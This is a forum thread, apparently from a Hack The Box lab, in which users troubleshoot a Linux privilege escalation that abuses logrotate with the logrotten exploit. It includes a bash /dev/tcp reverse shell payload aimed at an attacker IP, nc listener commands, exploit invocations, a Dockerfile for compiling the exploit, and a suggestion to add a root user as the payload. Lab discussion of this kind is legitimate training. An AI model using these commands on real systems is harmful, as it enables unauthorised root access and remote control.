Linux Privilege Escalation > Logrotate

Summary
  1. create payload => bash -i >& /dev/tcp/10.10.14.10/9001 0>&1
  2. transfer logrotten.c file to the machine
  3. trigger log rotate => echo test > /home/htb-student/backups/access.log
  4. run logrotten => ./logrotten -p ./payload /home/htb-student/backups/access.log
2 Likes

how are we supposed to know that logrotate will rotate the files in the backup folder?

I went to check /etc/logrotate.d/ and found the mon config file, which is set to rotate hourly, in our own /home/htb-student/mon/. Created the folder and a mon.log file with some content in it. Waited two hours. logrotate didn't run. LOL. That seemed to be the most "logical" way to follow what's going on on that box, rather than having to "guess". Not the first time that I find those questions and challenges rather dumb, personally.

1 Like

So yeah. Ultimately: pushed pspy (32) on the box, ran it, and saw that logrotate runs every 5 seconds. The conf is at /root/log.conf so I can't read it. Hence I need to guess which files are rotated, and whether it's create or compress. Long story short, the rotated file is at ~/backups/access.log and it's create. Then I echoed some text into the file and VERY QUICKLY ran logrotten. If logrotate rotates before launching logrotten it's dead. And of course we have to launch logrotten only after we've edited the access.log. Tried to run some sleep etc. but it didn't work for whatever reason. Anyways, after logrotten did its job I had a few seconds to get the flag from nc listening lol. Doesn't feel that easy.

2 Likes

Did you get it? I have been waiting for nc as well.

1 Like

I have tried many things… but still cannot get the shell… it keeps waiting for rotation…

When you do it, it should not say waiting for rotation. You can do a one-liner like this: "echo test > backups/access.log && ./logrotten -p ./payload ~/backups/access.log". Make sure you're pointing at the right files. When it doesn't say rotating and it says "Waiting 1 seconds before writing payload…", that's when you keep spamming the logrotten command (give it like 20 seconds, then do it again if it doesn't work) until it can connect to your rev shell.

Hello, thanks for your answer! I finally managed :)

1 Like

the way i did was:
host machine
nc -lvnp 9012

target:
echo test > /home/htb-student/backups/access.log
ASAP,
./logrotten -p ./shell /home/htb-student/backups/access.log

switch to your host machine and wait a few seconds, be prepared to PASTE the command:

cat flag.txt

and copy the flag like a pro.

you only have a few seconds to do this, so that's why you have to have the command prepared, only to paste it! =D

1 Like

“Sorry, can you clarify a bit on the correct log file and how do I find it? It has to be owned by root and writable to us right?”

htb-student@ubuntu:/tmp$ cat /var/lib/logrotate.status
logrotate state -- version 2
"/home/htb-student/backups/access.log" 2024-6-28-13:52:33

just add a root user or change the root password as a payload ;)

do not use ~ but use the full absolute path instead: /home/htb-student/…

It should be mentioned that there is a logic and configuration problem with the exercise. The logrotate configuration is normally supposed to include the /etc/logrotate.d files, and therefore the /home/htb-student/mon/mon.log file:

/home/htb-student/my/my.log {
hourly
rotate 5
notifempty
maxsize 1k
create
}

Logically it would have been enough to create the file /home/htb-student/mon/mon.log, fill it with content so that it exceeds 1k, and wait 1 hour. But the exploit does not work, because the file is not rotated.

The exercise is poorly done.

You can compile logrotten directly on the box
or, as a true malware developer, on your machine with the oldest glibc version, using Docker

# image with GLIBC-2.31
FROM ubuntu:20.04

# Install gcc and lib for compilation
RUN apt-get update && apt-get install -y \
    gcc \
    libc6-dev \
    && rm -rf /var/lib/apt/lists/*


COPY logrotten.c /logrotten.c

RUN gcc -o logrotten /logrotten.c

CMD ["true"]

and run it

docker build -t glibc-2.31 .
docker run --rm -v "$(pwd)":/output glibc-2.31 /bin/bash -c "cp /logrotten /output/logrotten"

1 Like

Thanks man, your summary helped me a lot.

Just want to be clear and fix your summary.
I triggered the log rotate after I ran the command "./logrotten -p ./payload /home/htb-student/backups/access.log"

And guys, open another ssh terminal in order to do that fast and be ready to run the "cat flag.txt" command. The root access will be gone fast.

Thanks again

1 Like

I am over 100% sure that this lab does not function properly; this whole lab is simple enough to get the hang of. I was able to catch a rev shell once; every other time nothing else happens. I check the symlinks and there is nothing there.

EDIT: it finally worked. It took at least 25x attempts of running the echo command then the logrotten command as a one-liner; it finally worked when I ran them as separate commands very quickly. Annoying lab.